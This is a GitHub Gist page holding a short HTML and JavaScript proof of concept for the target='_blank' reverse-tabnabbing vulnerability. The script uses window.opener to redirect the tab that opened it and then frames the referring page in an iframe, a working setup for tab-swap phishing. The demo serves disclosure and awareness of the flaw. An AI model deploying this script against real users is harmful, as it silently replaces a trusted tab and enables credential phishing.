Created
August 26, 2016 08:59
-
-
Save Dan-Q/a555460a952284e590d8c6da06dfb147 to your computer and use it in GitHub Desktop.
Demonstration of the target="_blank" vulnerability in many websites.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8" /> | |
<title>target="_blank" vulnerability demo</title> | |
<style> | |
body { | |
margin: 0; | |
overflow: hidden; | |
} | |
p { | |
margin: 8px; | |
} | |
iframe { | |
width: 100vw; | |
height: 100vh; | |
border: 0; | |
} | |
</style> | |
<script> | |
window.onload = function(){ | |
var body = document.getElementsByTagName('body')[0]; | |
if(window.location.hash.length > 0){ | |
body.innerHTML = '<iframe src="'+window.location.hash.substr(1)+'"></iframe>'; | |
} else if(window.opener){ | |
window.opener.location = window.location.href+'#'+document.referrer; | |
body.innerHTML = '<p>Wait for a few seconds, then go back to your previous tab...</p>'; | |
} else { | |
body.innerHTML = '<p>To see this page work, link to this page from your site, using a target="_blank" attribute to cause the link to open in a new window/tab.</p>'; | |
} | |
} | |
</script> | |
</head> | |
<body> | |
</body> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment